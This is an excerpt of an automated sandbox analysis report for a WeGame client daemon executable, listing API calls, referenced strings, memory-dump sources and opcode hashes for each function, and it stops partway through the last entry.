                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Copy_construct_fromH_prolog3H_prolog3_
                                                                • String ID: seq_num_
                                                                • API String ID: 1758982211-1175117602
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 004466CB
                                                                  • Part of subcall function 00442031: __EH_prolog3.LIBCMT ref: 00442038
                                                                • _Copy_construct_from.LIBCPMT ref: 00446801
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Copy_construct_fromH_prolog3H_prolog3_
                                                                • String ID: seq_num_
                                                                • API String ID: 1758982211-1175117602
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00446861
                                                                  • Part of subcall function 00441F84: __EH_prolog3.LIBCMT ref: 00441F8B
                                                                • _Copy_construct_from.LIBCPMT ref: 00446997
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Copy_construct_fromH_prolog3H_prolog3_
                                                                • String ID: seq_num_
                                                                • API String ID: 1758982211-1175117602
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 004469F7
                                                                  • Part of subcall function 00441FDC: __EH_prolog3.LIBCMT ref: 00441FE3
                                                                • _Copy_construct_from.LIBCPMT ref: 00446B2D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Copy_construct_fromH_prolog3H_prolog3_
                                                                • String ID: seq_num_
                                                                • API String ID: 1758982211-1175117602
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00446B8D
                                                                  • Part of subcall function 004420DB: __EH_prolog3.LIBCMT ref: 004420E2
                                                                • _Copy_construct_from.LIBCPMT ref: 00446CC3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Copy_construct_fromH_prolog3H_prolog3_
                                                                • String ID: seq_num_
                                                                • API String ID: 1758982211-1175117602
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00446D23
                                                                  • Part of subcall function 00441D80: __EH_prolog3.LIBCMT ref: 00441D87
                                                                • _Copy_construct_from.LIBCPMT ref: 00446E59
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Copy_construct_fromH_prolog3H_prolog3_
                                                                • String ID: seq_num_
                                                                • API String ID: 1758982211-1175117602
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00446EB9
                                                                  • Part of subcall function 00441F2F: __EH_prolog3.LIBCMT ref: 00441F36
                                                                • _Copy_construct_from.LIBCPMT ref: 00446FEF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Copy_construct_fromH_prolog3H_prolog3_
                                                                • String ID: seq_num_
                                                                • API String ID: 1758982211-1175117602
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 00452EE7
                                                                • __RTDynamicCast.VCRUNTIME140(?,00000000,004A4A68,004A6A98,00000000,85A35C35,?,?,?,?,?,00474A2F,000000FF), ref: 00452FB5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CastDynamicH_prolog3
                                                                • String ID: 73E
                                                                • API String ID: 1542823071-750320168
                                                                • Opcode ID: a767413909af096a515dc3ff37d49565ceb320525922476cc24f5a16689ce66a
                                                                • Instruction ID: eeb56198103ded98d94755b407a3ddfeec9f99ccdc2d2b3ffebe303f20992a00
                                                                • Opcode Fuzzy Hash: a767413909af096a515dc3ff37d49565ceb320525922476cc24f5a16689ce66a
                                                                • Instruction Fuzzy Hash: 3D31D0B2600204AFDB10CF65C981BAAB7F9FB45714F10452FF84AC7241DBB8AD04C758
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00452E14
                                                                  • Part of subcall function 0046B4D1: __EH_prolog3_GS.LIBCMT ref: 0046B4D8
                                                                • _CxxThrowException.VCRUNTIME140(00000008,0049C0FC,00000000,00000008), ref: 00452E7F
                                                                Strings
                                                                • format specifier '{}' requires signed argument, xrefs: 00452E4C
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3_$ExceptionThrow
                                                                • String ID: format specifier '{}' requires signed argument
                                                                • API String ID: 478813208-2116603712
                                                                • Opcode ID: b5876d2c27dad80efa92f6dc624d3ed026cd11a64b40dbae5334de65ed9b658a
                                                                • Instruction ID: 3530882dfa9912b55f80ff8c92688c714c71271be30428fdf2b782a382c732c9
                                                                • Opcode Fuzzy Hash: b5876d2c27dad80efa92f6dc624d3ed026cd11a64b40dbae5334de65ed9b658a
                                                                • Instruction Fuzzy Hash: D9112B35504108AFCF10DFA5D5429EE7B75EF06316F14801FFC1457213DB78A94A879A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                  • Part of subcall function 00420E50: memmove.VCRUNTIME140(00000000,00000000,00000000,00420411,00000000,00000000,00000000,?,00423F52,00000000,00000001), ref: 00420E77
                                                                • WideCharToMultiByte.KERNEL32(0000000F,00000000,?,00000001,00000000,00000000,00000000,00000000,(null),00000006,85A35C35,?,?,?,?,00476AFD), ref: 0044E3E3
                                                                • WideCharToMultiByte.KERNEL32(00000010,00000000,?,00000001,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00476AFD,000000FF), ref: 0044E40F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ByteCharMultiWide$memmove
                                                                • String ID: (null)
                                                                • API String ID: 787594944-3941151225
                                                                • Opcode ID: 2f567bb1d24361cc1d4b9be72231fc7387d8e633346353f02b09748f500ff85a
                                                                • Instruction ID: b31337488b65670b8edeec67ce0f734928e9a4e47a78c2f893db1ae4e7a356c1
                                                                • Opcode Fuzzy Hash: 2f567bb1d24361cc1d4b9be72231fc7387d8e633346353f02b09748f500ff85a
                                                                • Instruction Fuzzy Hash: 52117CB1600258BFEB258F59CC85FABBBBDFB08754F10852EB91597280D3B59D008B64
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 0046237A
                                                                  • Part of subcall function 004590D4: __EH_prolog3.LIBCMT ref: 004590DB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3
                                                                • String ID: ^tgp_(.*)_0n$$^wegamesetup(.*)
                                                                • API String ID: 431132790-3769506146
                                                                • Opcode ID: bdfa71cd330b3d963235f46c039802dbd4967dad25aa24eba6136da548754912
                                                                • Instruction ID: df75ccbfd1639e9a25885cdb793eb5409e21109f4469cf1a48567d8a927de989
                                                                • Opcode Fuzzy Hash: bdfa71cd330b3d963235f46c039802dbd4967dad25aa24eba6136da548754912
                                                                • Instruction Fuzzy Hash: 8111A070C00318AADB10EF629D46AEEBB74EF50760F04060BAC21673D2DBB90E45C789
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,00000008,?,?,?,00453337), ref: 00468B70
                                                                • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,?,?,00453337), ref: 00468BAA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@?pptr@?$basic_streambuf@
                                                                • String ID: 73E
                                                                • API String ID: 2127219216-750320168
                                                                • Opcode ID: 515eda75c96cd0655def1978f1681c8a7cd632997408b014fb9e2ce0ef88a1fa
                                                                • Instruction ID: 3ebdd8a0a27ebe9b89d86458a6ee92d8e6d24bb8c842612a73ba53047e8ec967
                                                                • Opcode Fuzzy Hash: 515eda75c96cd0655def1978f1681c8a7cd632997408b014fb9e2ce0ef88a1fa
                                                                • Instruction Fuzzy Hash: 0911F5B5A002008FC7109F2AC849D5AFBF9AF94750756868BD405CB372DBB0E941CB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • memset.VCRUNTIME140(?,00000000,00000044), ref: 0046479B
                                                                • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 004647CE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CreateProcessmemset
                                                                • String ID: D
                                                                • API String ID: 2296119082-2746444292
                                                                • Opcode ID: ad49d06eb3791e69eef6a048262665f0756d0032147fffbe869165ef71457d06
                                                                • Instruction ID: 4a18fe74b27f85181bd26444a616de4e9f7ec9d0ac9009bcdcefae17f725ad7a
                                                                • Opcode Fuzzy Hash: ad49d06eb3791e69eef6a048262665f0756d0032147fffbe869165ef71457d06
                                                                • Instruction Fuzzy Hash: 0CF0FEB1500508BFEB44DBE8DD89DAB77BDEF44708F004429E216DA154E778AD488666
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 0045E9D9
                                                                  • Part of subcall function 0043DF1B: __EH_prolog3.LIBCMT ref: 0043DF22
                                                                  • Part of subcall function 0043F4BB: __EH_prolog3_catch_GS.LIBCMT ref: 0043F4C2
                                                                Strings
                                                                • clear_log_file, exception = [%s], xrefs: 0045EA22
                                                                • e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp, xrefs: 0045E9FD
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?get_log_instance@base@@H_prolog3H_prolog3_catch_Logger@1@
                                                                • String ID: clear_log_file, exception = [%s]$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp
                                                                • API String ID: 750329627-2335837964
                                                                • Opcode ID: 555d4791d059acad6ee0002b3ddac6b01ead825ac6bc108b7fa2a7f2055b7272
                                                                • Instruction ID: 9e38855e06d34f2860ef0dbba312a8a61f462360586daefcef486d93475e9969
                                                                • Opcode Fuzzy Hash: 555d4791d059acad6ee0002b3ddac6b01ead825ac6bc108b7fa2a7f2055b7272
                                                                • Instruction Fuzzy Hash: BAF0F031E40610ABCB25E625CC42FAE6321AF25709F6441C9F9052B7C2DB795F09CB89
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 0046A439
                                                                  • Part of subcall function 0043DF1B: __EH_prolog3.LIBCMT ref: 0043DF22
                                                                  • Part of subcall function 0043F4BB: __EH_prolog3_catch_GS.LIBCMT ref: 0043F4C2
                                                                Strings
                                                                • [App]std::exception in get_version!, xrefs: 0046A474
                                                                • e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp, xrefs: 0046A45D
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?get_log_instance@base@@H_prolog3H_prolog3_catch_Logger@1@
                                                                • String ID: [App]std::exception in get_version!$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp
                                                                • API String ID: 750329627-2599211935
                                                                • Opcode ID: 41b91eff65aaf9426287f7595ddcbb61134116a863265c5434c808a43d32337a
                                                                • Instruction ID: 471e7dfac0c7ed14696ef5b9ef139169a47914d050adb6cfd3af5404e0bafd50
                                                                • Opcode Fuzzy Hash: 41b91eff65aaf9426287f7595ddcbb61134116a863265c5434c808a43d32337a
                                                                • Instruction Fuzzy Hash: 4FF02420E01740AAD711E6288C96F9E67108F25708F9080AEE5403B3C2EEAC4E15CF9F
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • ?uncaught_exception@std@@YA_NXZ.MSVCP140(85A35C35,00000000,?,00000000,00479146,000000FF,73E,00451550), ref: 0045C889
                                                                • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(85A35C35,00000000,?,00000000,00479146,000000FF,73E,00451550), ref: 0045C894
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?uncaught_exception@std@@D@std@@@std@@Osfx@?$basic_ostream@U?$char_traits@
                                                                • String ID: 73E
                                                                • API String ID: 888405505-750320168
                                                                • Opcode ID: c20509fc4cfc2b668ff5a53d2ccd44dc7dfdca9b1aa16dd1f7ee0c52adc8fbd1
                                                                • Instruction ID: 77a5459194036d831d7c76103f337c50202e87b199e21d40ab2bfb783d40b9e8
                                                                • Opcode Fuzzy Hash: c20509fc4cfc2b668ff5a53d2ccd44dc7dfdca9b1aa16dd1f7ee0c52adc8fbd1
                                                                • Instruction Fuzzy Hash: E9F0E272904604EFDB14DF58C941B9DB7F8EB49725F10436EE862932C0EB782A008A98
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • _To_byte.MSVCP140(?,?), ref: 00466886
                                                                • ?_Xinvalid_argument@std@@YAXPBD@Z.MSVCP140(invalid wchar_t filename argument), ref: 004668B1
                                                                  • Part of subcall function 0043A670: memmove.VCRUNTIME140(?,?,?), ref: 0043A6AC
                                                                Strings
                                                                • invalid wchar_t filename argument, xrefs: 004668AC
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: To_byteXinvalid_argument@std@@memmove
                                                                • String ID: invalid wchar_t filename argument
                                                                • API String ID: 1736073181-1601001258
                                                                • Opcode ID: eb973d830c85cc4548a1db69a0e069432ddba1259af81e437627f7d7c465e392
                                                                • Instruction ID: c4f2fc2e7584400560f0ae0828dbdc40163a0d2ce825dc0000f8e7185f3c77bd
                                                                • Opcode Fuzzy Hash: eb973d830c85cc4548a1db69a0e069432ddba1259af81e437627f7d7c465e392
                                                                • Instruction Fuzzy Hash: EBF0A73560011957CF04EB6AD812ADE77EC9F04324F10009AA44197281EEB4EA848759
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • ?is@?$ctype@_W@std@@QBE_NF_W@Z.MSVCP140(000000FF,00000000,?,00465652,00000000,?,00000004,00466499,?,?,00000000,?,?,?,?,?), ref: 0046A781
                                                                • ?is@?$ctype@_W@std@@QBE_NF_W@Z.MSVCP140(00000107,0000005F,?,00465652,00000000,?,00000004,00466499,?,?,00000000,?,?,?,?,?), ref: 0046A79B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?is@?$ctype@_W@std@@
                                                                • String ID: _
                                                                • API String ID: 3980928862-701932520
                                                                • Opcode ID: b63d432dfd4d4ec733e9731186e4383c04324593738bd39df519d59d9a85c1c8
                                                                • Instruction ID: ff0c1fc6cf3615bc641a564b9e3d2a742503710c8a375cab4bd1cdf11c9ed330
                                                                • Opcode Fuzzy Hash: b63d432dfd4d4ec733e9731186e4383c04324593738bd39df519d59d9a85c1c8
                                                                • Instruction Fuzzy Hash: BDE01A38400608BACB149F40D8489A53B71BF10315B14C026FA4D2A2A1E776D9A7DF87
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 00442F03
                                                                  • Part of subcall function 00441A4F: __EH_prolog3.LIBCMT ref: 00441A56
                                                                  • Part of subcall function 004419BC: __EH_prolog3.LIBCMT ref: 004419C3
                                                                • _CxxThrowException.VCRUNTIME140(?,004966FC,00000000,0000001C,?), ref: 00442F2E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3$ExceptionThrow
                                                                • String ID: ~0D
                                                                • API String ID: 2323905274-265891634
                                                                • Opcode ID: b2fc8614671074dfa5ccd843f1044c5e460dc9e2ed787640f45f32eabc22a96a
                                                                • Instruction ID: 7fec55fb4f8aeab86f9935389e29bb249af83b42417121383fbfa14e761700bb
                                                                • Opcode Fuzzy Hash: b2fc8614671074dfa5ccd843f1044c5e460dc9e2ed787640f45f32eabc22a96a
                                                                • Instruction Fuzzy Hash: 25E012B1D0030DA6DF00F6E5CC06ECE767CEB00308F10841BB118A7052DB7D9644876D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3
                                                                • String ID: H$IDownload_mgr
                                                                • API String ID: 431132790-1585110086
                                                                • Opcode ID: b95e77fbb45a0a160c6b111b2eaf5d7b61e7902cff851805749e975b14b84305
                                                                • Instruction ID: 6365d281e75b6003c1685afe2f295f07b79233813a28d6430f47bf2b6d86f694
                                                                • Opcode Fuzzy Hash: b95e77fbb45a0a160c6b111b2eaf5d7b61e7902cff851805749e975b14b84305
